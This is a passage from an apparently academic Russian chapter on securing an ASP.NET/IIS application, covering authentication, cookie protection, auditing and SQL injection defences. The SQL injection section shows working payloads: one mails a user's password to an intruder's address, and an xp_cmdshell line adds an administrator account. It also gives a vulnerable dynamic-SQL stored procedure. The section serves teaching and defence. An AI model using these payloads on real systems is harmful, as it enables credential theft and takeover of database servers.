На прикладном уровне Web-защита связана в основном с защитой данных, чтобы их не могли просматривать и изменять данные неавторизованные пользователи. Например, только руководители имеют право просматривать информацию, связанную с объемом денежных средств, затраченных на приобретение средств ВТ, и только администраторы задачи могут вносить изменения в базу данных. Любая форма защиты требует от приложения двух очевидных действий:

· определение источника каждого запроса;

· определение правил, задающих права доступа к страницам.

Web-сервер осуществляет идентификацию обращающихся к нему пользователей с помощью аутентификации. После того, как пользователь идентифицирован, авторизация поддерживает разные модели аутентификации и авторизации. Понимание набора доступных возможностей и их взаимосвязь- первый шаг в проектировании защищенного приложения.

4.3.1 Средства защиты IIS

IIS- это Web-сервер, основная задача которого - устанавливать соединения с удаленными клиентами и отвечать за http-запросы, поступающие по этим соединениям. Большинство запросов - это http-команды GET и POST, запрашивающие html-файлы, aspx-файлы и ресурсы файловой системы. Для защиты содержимого сервера IIS предоставляет четыре механизма:

· web-приложения размещаются в виртуальных каталогах, адресуемых с помощью URL; удаленные клиенты не могут произвольно обращаться к файлам вне виртуальных каталогов и их подкаталогов

· каждому запросу присваивает маркер доступа, описывающий пользователя Windows; этот маркер позволяет операционной системе проверять права доступа к файловой системе тех ресурсов, к которым обращается запрос

· поддерживает ограничения по IP-адресам и именам доменов, что позволяет предоставлять или нет доступ на основании IP-адреса или домена поступившего запроса

· поддерживает шифрованные http-соединения на основе семейства протоколов SSL(Secure Sockets Layer),сам по себе он не предназначен для защиты ресурсов сервера, однако он не позволяет прочитать переговоры Web-сервера и удаленных клиентов

IIS исполняется как процесс Inetinfo.exe, который обычно исполняется от имени учетной записи SYSTEM, обладающей высоким уровнем и привилегий на локальном компьютере, но запросы, передаваемые от IIS к ASP.NET, не исполняются в контексте SYSTEM, они исполняются от имени конкретного пользователя, выбор которого зависит от конфигурации запрашиваемого ресурса.

Если запрашиваемый файл требует аутентифицированного доступа, то IIS связывает запрос с учетной записью, параметры которой указывает отправитель запроса. Если пользователь может доказать свою подлинность IIS, то запросу присваивается маркер доступа этого пользователя.

IIS проверяет подлинность пользователя с помощью аутентификации, которая бывает нескольких типов: обычная (basic), краткая (digest), встроенная (integrated) Windows-аутентификация, клиентские сертификаты SSL. Обычную и краткую применяют для идентификации имени и пароля пользователей, подходит для работы в Интернет; встроенную - для идентификации учетных данных Windows, не подходит для работы в Интернет; применение клиентских сертификатов SSL ограничено в основном интрасетями, так как требуют раздачи клиентам цифровых сертификатов.

На рисунке 4.19 показано взаимодействие между IIS и ASP.NET. Когда IIS получает запрос файла, относящегося к ASP.NET(файл ASPX), он передает запрос ISAPI DLL (Aspnet_isapi.dll, который исполняется в том же процессе, что и IIS, то есть внутри). Приложения ASP.NET исполняются в отдельном процессе - . Aspnet_isapi.dll передает запросы Aspnet_wp.exe через именованный канал. Когда запрос достигает рабочего процесса, он назначается конкретному приложению, исполняющемуся в конкретном домене приложения. Внутри домена приложения запрос перемещается по http- конвейеру ASP.NET, где его просматривают различные http-модули, и в конце концов попадает к http-обработчику, соответствующему запрашиваемому ресурсу.

Размещено на http://www.allbest.ru/

Рисунок 4.19 - Взаимодействие IIS и ASP.NET

Когда Aspnet_isapi.dll передает http-запросу Aspnet_wp.exe, вместе с ним передается и маркер доступа, полученный из IIS. Прежде чем обработать запрос, пропустив его по http-конвейеру приложения, Aspnet_wp.exe с помощью маркера выполняет проверку прав доступа к файловым ресурсам, а затем маркер передается приложению, чтобы это приложение могло олицетворить автора запроса и ограничить его в случае надобности.

Степень успеха реализации зависит от решаемого круга задач приложения, от того, под чьим именем будет исполняться рабочий процесс ASP.NET и обрабатываемые им запросы. Если Aspnet_wp.exe исполняется как SYSTEM, то приложение может делать на компьютере сервера все, что угодно, что делает ASP.NET менее устойчивым к атакам. Но по умолчанию Aspnet_wp.exe исполняется как ASPNET - особая учетная запись, создаваемая при установке ASP.NET на компьютере, которая является членом группы Users, почему и имеет достаточные привилегии для выполнения большинства действий, но и достаточно ограничен в правах, чтобы защититься от некоторых типов атак. Помимо прочего, это означает, что, кроме случаев изменения конфигурации, приложения ASP.NET не могут выполнять ряд действий, например, изменять значения в разделе реестра HKEY_LOCAL_MACHINE.

4.3.2 Аутентификация и авторизация

Аутентификация позволяет получателю запроса удостовериться в подлинности его отправителя. Отправитель запроса может утверждать что угодно, но пока он не аутентифицирован, в этом нельзя быть уверенным. Аутентификация - важный элемент не только web-безопасности, но и сетевой безопасности вообще, так как она устанавливает доверие. Авторизация- это другая часть определения безопасности. После того, как личность пользователя установлена, авторизация определяет, к каким ресурсам он имеет доступ.

Поддерживается три типа аутентификации: Windows-аутентификация, Passport- аутентификация и Forms- аутентификация[5].

Windows-аутентификация применяется, когда приложение используется в локальной сети, каждый его пользователь имеет учетную запись, под которой он может войти в сеть и получить доступ к сетевым ресурсам, или когда приложение предназначено не только для работы пользователей локальной сети, но и должна быть возможность работы с приложением удаленно. Помимо недопущения пользователей, не имеющих на это прав, к частям приложения с ограниченным доступом, также можно использовать встроенные механизмы безопасности операционной системы. Passport-аутентификацию применяют для аутентификации пользователей Microsoft Password - web-сервис, выступающий в качестве интерфейса большой базы данных имен пользователей и паролей, поддерживаемой Microsoft. Выглядит следующим образом: при входе на страничку пользователь авторизуется с параметрами своего электронного адреса, выступающего в роли имени пользователя, и пароля; затем наше приложение обращается к официальному сайту Microsoft, если сайт Microsoft подтверждает, наше приложение его авторизует с его правами. Этот тип аутентификации практически не используют по вполне объективным причинам: во-первых, это будет медленный процесс, во-вторых, нужно оплачивать Microsoft такую услугу. Forms- аутентификацию используют для удостоверения в личности пользователя, прежде, чем дать ему доступ к некоторым страницам.

Проанализировав возможные типы аутентификаций, наиболее подходящей будет Forms-аутентификация. При этом аутентификация пользователя выполняется путем запроса у него параметров регистрации (логин и пароль) с помощью Web-формы. В файле Web.config проекта указываем регистрационную страницу и сообщаем ASP.NET, какие ресурсы эта страница защищает. При первом обращении пользователя к защищенному ресурсу ASP.NET автоматически перенаправляет его на эту регистрационную страницу. Если регистрация прошла успешно, ASP.NET выдает пользователю в виде «cookie» (небольшой файл на компьютере клиента, в котором находятся данные для конкретного Web-узла) аутентификационный ярлык и перенаправляет его на страницу запрошенную первоначально. Временем жизни ярлыка можно управлять. Алгоритм работы по Forms-аутентификации представлен на рисунке 4.20.

Размещено на http://www.allbest.ru/

Рисунок 4.20 - Последовательность действий при аутентификации

Такая аутентификация обеспечивает большой контроль над сценариями идентификации для приложения. Если приложение принимает данные пользователя, то в броузере ASP.NET создает «cookie»[28, c.227]. Программный код, реализующий аутентификацию и авторизацию представлен в приложении К.

Атрибут name элемента <forms> определяет имя «cookie», который будет установлен в случае успешной аутентификации. Значение по умолчанию - .ASPXAUTH. Если запускается несколько приложений на одном сервере, то следует дать каждому приложению или виртуальной папке уникальное имя «cookie», используя этот атрибут. Атрибут loginUrl определяет URL на который будет переадресован пользователь если не будет найден корректный «cookie». Атрибут protection определяет уровень защиты (шифрование, основанная на MAC коде проверка) для «cookie», используемого при аутентификации. "All" - это значение по умолчанию (рекомендуемое значение). Атрибут timeout определяет количество минут, после истечения которых, «cookie» считается устаревшим и более не может использоваться. Вы можете использовать этот атрибут для требования повторной регистрации после истечения заданного времени, в течение которого пользователь не проявил активность. Срок годности аутентификационного «cookie» не обновляется при каждом запросе ASPX страниц, а обновляется при запросах страниц, которые произошли по истечении половины срока годности «cookie». Атрибут path определяет путь, по которому в виртуальной папке хранится файл «cookie».

Сами аутентификационные «cookie» необходимо защитить, для чего необходимо задать желаемый уровень защиты. Проверка «cookie» работает следующим образом: к «cookie» добавляется значение validationKey элемента machineKey, полученное значение хэшируется и хэш добавляется в «cookie». Когда «cookie» возвращается обратно в составе запроса, ASP.NET проверяет, что он не подделан, снова вычисляет хэш-значение и сравнивает его с тем, которое находится в «cookie». Шифрование работает путем шифрования «cookie»(хэш-значения и всего остального), применяя атрибут decryptionKey элемента machineKey. Проверка требует меньше процессорного времени, чем шифрование, и предотвращает подделки. Но она не мешает перехватывать «cookie» и просматривать их содержимое. Шифрование же обеспечит двойную защиту от подделок, а также препятствует просмотру содержимого «cookie».

Так как приложение работает по протоколу HTTPS, то зашифрованные «cookie» не могут быть прочитаны или изменены, но их могут украсть. Поэтому здесь защитой для «cookie» будут тайм-ауты, которые работают для сеансовых «cookie».

Существует ограничение на время существования открытой сессии задачи на сервере (определяется настройками). Если время сеанса работы пользователя превышает это ограничение - ему будет предложено повторить авторизацию для продолжения работы. Эта особенность специфична для веб-технологий, где клиентская машина не удерживает непрерывную связь с сервером (так называемый link), а обращается к созданной пользователем сессии на сервере точечно - в момент выполнения запроса.

4.3.3 Доступ к данным через ADO.NET

ADO.NET (ActiveX Data Object .NET)представляет собой набор классов в пространстве имен System.Data библиотеки классов .NET и его потомках. Иными словами ADO.NET- язык для общения управляемых приложений с базой данных, программный интерфейс используемый для доступа к базе данных. ADO.NET- один из важнейших компонентов .NET Framework.

Размещено на http://www.allbest.ru/

Рисунок 4.21 - Модель доступа к данным в ADO.NET и ASP.NET

Двойственность ADO.NET - это первое, что должен знать любой разработчик. ADO.NET осуществляет доступ к базе данных через программные модули- провайдеры данных (SQL Server.NET и OLE DB .NET).

OLE DB - технология доступа к данным, представляет унифицированный объектно- ориентированный API для разнообразных баз данных, так же как драйверы ODBC(Open Database Connectivity) предоставляет процедурный клиентский интерфейс для разных типов баз данных[31, c.501].

Как происходит запрос пользователя? Пользователь сначала обращается к странице, затем происходит обращение к Web-серверу, который в свою очередь обращается к базе данных с помощью SQLConnection, после через SQLAdapter данные из базы данных возвращаются в DataSet(DataReader) к клиенту через Web-сервер (рисунок 4.21).

4.3.4 Защита передаваемых данных

Защита передаваемых по сети данных рассмотрена в главе 3.3.7 «Защита сетевого трафика», при этом при обращении пользователя к приложению идет его переадресация на защищенный протокол передачи данных https.

4.3.5 Защита от некорректного ввода данных

Контролировать вводимые пользователем данные можно на стороне клиента и на стороне сервера (рисунок 4.22). Отличие в том, что на стороне клиента контроль будет сравнительно простой, на стороне же сервера можно проводить более сложные алгоритмы проверки.

Размещено на http://www.allbest.ru/

Рисунок 4.22 - Алгоритм проверки вводимых пользователем данных

Контроль на стороне клиента организует проверку на наполняемость, проверку типа, длины, составного типа выражения, соответствия определенному диапазону значений [1, c.13]. На стороне сервера реализуется с применением хранимых процедур, триггеров и проверок в конкретных ситуациях.

4.3.6 Протоколирование и аудит

Под протоколированием понимается сбор и накопление информации о событиях, происходящих в системе. Аудит - это анализ накопленной информации, проводимый оперативно, почти в реальном времени, или периодически. Реализация протоколирования и аудита преследует следующие главные цели:

· обеспечение подотчетности пользователей и администраторов;

· обеспечение возможности реконструкции последовательности событий;

· обнаружение попыток нарушений информационной безопасности;

· предоставление информации для выявления и анализа проблем.

Обеспечение подотчетности важно в первую очередь как средство сдерживания. Если пользователи и администраторы знают, что все их действия фиксируются, они, возможно, воздержатся от незаконных операций. Если есть основания подозревать какого-либо пользователя в нечестности, можно регистрировать его действия особенно детально, вплоть до каждого нажатия клавиши. При этом обеспечивается не только возможность расследования случаев нарушения режима безопасности, но и откат некорректных изменений. Тем самым обеспечивается целостность информации.

Восстановление последовательности событий позволяет выявить слабости в защите сервисов, найти виновника вторжения, оценить масштабы причиненного ущерба и вернуться к нормальной работе.

Выявление и анализ проблем позволяют помочь улучшить такой параметр безопасности, как доступность.

Обнаружив узкие места, можно попытаться переконфигурировать или перенастроить систему, снова измерить производительность и т.д. Т.о., это необходимый шаг для регистрации изменений в базе данных, а также в процессе разработки, сопровождения, администрирования, документирования и распространения программных продуктов или систем, использующих эту базу данных. Этот подпункт в программном проекте реализован на форме «Журнал событий БД СВТ» совместно с протоколированием на уровне базы данных и сервера (глава 4.2.6).

4.3.7 Защита от неблагонамеренных действий пользователей

Защита от некорректных действий (в том числе и ошибок) пользователей представляет собой контроль за действиями пользователей. Контроль осуществляется на соответствие прав доступа, типа и длины вводимых данных, ввода непустых значений, проверкой на дублирование. Предусмотрена также обработка ошибок пользовательского типа.

Как через приложение можно получить неправомерный доступ к базе данных? Есть несколько вариантов:

· перехватить аутентификационные данные легитимных пользователей и потом воспользовавшись ими выполнять какие-либо действия

· перехватить сами данные, которые возвращает база данных на запросы пользователей

· получить информацию о структуре базы данных, используя ошибочные действия; в случае, если не произведена в приложении обработка ошибок

· посылать в виде запроса устойчивые конструкции, внедрение SQL кода (SQL-Injection)

· подбор паролей пользователей

Защита от первого и второго варианта атаки осуществляется средствами SSL-протокола передачи данных, средствами IPSec и шифрования аутентификационных cookie; от третьего - обработкой ошибок; от четвертого- использование хранимых процедур, в теле которых идет проверка вводимых данных и отсеивание; от последнего - в журнале событий базы данных ведется аудит попыток входа пользователей, соответственно, если за короткий промежуток времени, например, 10 секунд, пользователь попытался ввести свой пароль 100 раз, это вызовет подозрительность в благонадежности этого пользователя, к тому же пароли пользователей не должны быть слабыми.

Проблема многих приложений состоит в динамической генерации SQL запросов и отправке их в СУБД без предварительной обработки. Например, следующий фрагмент кода не является редкостью:

...

Set rs = cn.Execute("SELECT password FROM Users WHERE email”) =Request.Form("email")

…

objMail.To = Request.Form("email")

objMail.Send(rs("password"))

…

Нетрудно видеть, что через поле формы email можно изменить логику запроса. Например, с большой долей вероятности можно получить пароль произвольного пользователя, если в качестве значения поля email будет получено:

userMail@host.com' OR email=';intruder@provider.com'

Запрос будет выглядеть так:

SELECT password FROM dbo.Users WHERE email = 'userMail@host.com' OR email=';intruder@provider.com'

Это приведет к тому, что будет выбран пароль пользователя с адресом userMail@host.com, но отправлен он будет, скорее всего, по адресу intruder@provider.com, т.к. многие почтовые компоненты считают символ “;” разделителем адресов. Этот сценарий будет работать в случае, если запросы строятся динамически и без проверки пользовательского ввода. Если же приложение работает под учетной записью, обладающей большими привилегиями в SQL Server, то последствия могут быть еще печальнее, вплоть до получения контроля над машиной, где работает SQL Server:

'; EXEC master.dbo.xp_cmdshell ' net user john pass /add && net localgroup Administrators john /add

Пользуясь подобными ошибками, злоумышленник может раскрыть схему таблиц. Кроме того, в ряде случаев такие ошибки сводят на нет все усилия по защите сети через брандмауэр, т.к. атака может идти поверх HTTP, а для обмена данными, проникновения во внутреннюю сеть может использоваться SQL Server злоумышленника, выступающий в качестве присоединенного сервера. Например, может быть использован такой запрос для получения списка баз на другом SQL сервере:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=INTERNAL_SQL_SERVER; UID=sa; PWD=password;','select * from sysdatabases')

При этом могут использоваться также и удаленные и присоединенные SQL сервера, зарегистрированные на захваченной машине. Для того, чтобы избежать ошибок подобного рода можно применить следующие методы:

· Не запускать приложения под привилегированными "учетными записями" (sysadmin, db_owner) SQL Server. Не запускать SQL Server под привилегированными учетными записями операционной системы (LocalSystem, Administrators group member).

· Отказаться от динамических запросов в пользу хранимых процедур. Это позволит не только искоренить SQL Injection, но и воспользоваться другими преимуществами использования хранимого кода. Однако не стоит забывать, что в случае использования динамических запросов внутри хранимых процедур проблема внедрения кода все же остается. Например:

CREATE PROCEDURE dbo.GetUsers (@Field varchar(100))

AS SET NOCOUNT ON

EXEC ('SELECT UserID, Username, FirstName, LastName FROM dbo.Users ORDER BY ' + @Field)

RETURN

GO

· Использовать параметризованные запросы

· Использовать регулярные выражения для проверки пользовательского ввода до того, как он будет отправлен в СУБД. В случае несоответствия ввода и шаблона выдавать сообщение об ошибке клиенту, оставлять запись об ошибке (ни в коем случае не показывать клиенту ошибки SQL Server) в журнале приложения и прекращать выполнение запроса.

· Использовать функции для экранирования служебных символов. Например

strEmail = Replace(Request.Form("Email"), "'", "''")

· Проводить обзор кода (code review) и следовать стандартам кодирования. В качестве автоматических тестирующих средств можно порекомендовать SPI Dynamic WebInspect 2.6. Данное средство тестирования приложений пытается отыскать и ошибки класса "SQL Injection".

4.4 Реализация стойких паролей